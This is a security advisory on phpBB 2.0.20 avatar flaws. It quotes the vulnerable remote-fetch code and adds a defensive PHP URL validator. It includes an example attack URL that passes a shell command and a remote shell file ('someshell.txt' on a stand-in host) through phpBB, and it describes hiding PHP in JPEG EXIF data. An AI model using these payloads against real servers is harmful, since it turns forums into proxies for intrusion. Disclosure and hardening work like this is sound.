
PHPBB 2.0.20 persistent issues with avatars






PHPBB 2.0.20 multiple issues with avatars

Some problems persist in the way phpBB handles remote and uploaded avatars.

A remote user can:

(1) fill the server with useless files, because phpBB does not delete
the previous avatar when a new one is uploaded

(2) use phpBB installations to launch exploits against other servers,
by supplying the "avatarurl" argument, when modifying a profile, as the path
of a GET request.

See usercp_avatar.php near lines 125-153:
...
// $url_ary[2] = host, $url_ary[3] = port, $url_ary[4] = everything after the first slash
if ( $avatar_mode == 'remote' && preg_match('/^(http:\/\/)?([\w\-\.]+)\:?([0-9]*)\/(.*)$/', $avatar_filename, $url_ary) )
	{
		if ( empty($url_ary[4]) )
		{
			$error = true;
			$error_msg = ( !empty($error_msg) ) ? $error_msg . '<br />' . $lang['Incomplete_URL'] : $lang['Incomplete_URL'];
			return;
		}

		$base_get = '/' . $url_ary[4];
		$port = ( !empty($url_ary[3]) ) ? $url_ary[3] : 80;

		if ( !($fsock = @fsockopen($url_ary[2], $port, $errno, $errstr)) )
		{
			$error = true;
			$error_msg = ( !empty($error_msg) ) ? $error_msg . '<br />' . $lang['No_connection_URL'] : $lang['No_connection_URL'];
			return;
		}

		// the user-supplied path and query string are sent as-is
		@fputs($fsock, "GET $base_get HTTP/1.1\r\n");
		@fputs($fsock, "HOST: " . $url_ary[2] . "\r\n");
		@fputs($fsock, "Connection: close\r\n\r\n");

		unset($avatar_data);
		while( !@feof($fsock) )
		{
			$avatar_data .= @fread($fsock, $board_config['avatar_filesize']);
		}
		@fclose($fsock);
...

phpBB does not check whether the user-supplied value ends with an image
extension, nor whether the supplied string contains "&" and "?" characters.
So a value like this can be submitted:

http://some_vulnerable.host/somescript.php?cmd=ls%20-la&xpl=http://somehost/someshell.txt

phpBB will launch a GET request like this:

GET /somescript.php?cmd=ls%20-la&xpl=http://somehost/someshell.txt HTTP/1.0
HOST: some_vulnerable.host
Connection: close

Obviously no output is returned, but this makes phpBB act like an HTTP proxy.

(3) inject PHP code inside JPEG files as EXIF metadata content:
this, in combination with vulnerable third-party code, can be used
to compromise the server where PHP is installed.
It should be enough to check for PHP code inside the temporary files
before copying the new avatar into the "images/avatars/" folder.

rgod
---------------------------------------------------------------------------------
mail: rgod [at] autistici [dot] org
site: http://retrogod.altervista.org
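
One way to implement the checks the advisory reports as missing in issue (2), as an added example that is neither phpBB's code nor rgod's. The function name, the allowed extensions and the port-80 restriction are assumptions, and the syntax targets PHP 7.1 or later.

```php
<?php
// Added example: stricter validation of the remote avatar URL (issue 2).
// avatar_url_rejection_reason() is a hypothetical helper, not a phpBB function.

function avatar_url_rejection_reason(string $url): ?string
{
    // Check the raw value first: CR/LF or spaces would let it break out
    // of the "GET <path> HTTP/1.1" line that is written to the socket.
    if (preg_match('/[\x00-\x20\x7f]/', $url)) {
        return 'control or space character in URL';
    }
    // The characters the advisory singles out: no query string, no fragment.
    if (strpbrk($url, '?&#') !== false) {
        return 'query string or fragment not allowed';
    }
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'], $parts['path'])) {
        return 'incomplete URL';
    }
    if (strtolower($parts['scheme']) !== 'http') {
        return 'scheme must be http';
    }
    // The original regex accepts any port number; allow only the default.
    if (isset($parts['port']) && $parts['port'] !== 80) {
        return 'non-default port';
    }
    // The path must end with an image extension (assumed list).
    if (!preg_match('/\.(gif|jpe?g|png)$/i', $parts['path'])) {
        return 'path does not end with an image extension';
    }
    return null; // nothing to object to
}

// Constructed sample inputs; the first is the value quoted in the advisory.
$samples = [
    'http://some_vulnerable.host/somescript.php?cmd=ls%20-la&xpl=http://somehost/someshell.txt',
    'http://images.example/avatars/user.gif',
    'http://images.example:8080/avatars/user.gif',
    'http://images.example/avatars/user.php',
];
foreach ($samples as $s) {
    $why = avatar_url_rejection_reason($s);
    echo ($why === null ? 'ACCEPT' : "REJECT ($why)") . "  $s\n";
}
```

Only the second sample is accepted. The extension check constrains the request path, not what the remote server returns, so the fetched data still needs its own validation before it is stored.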

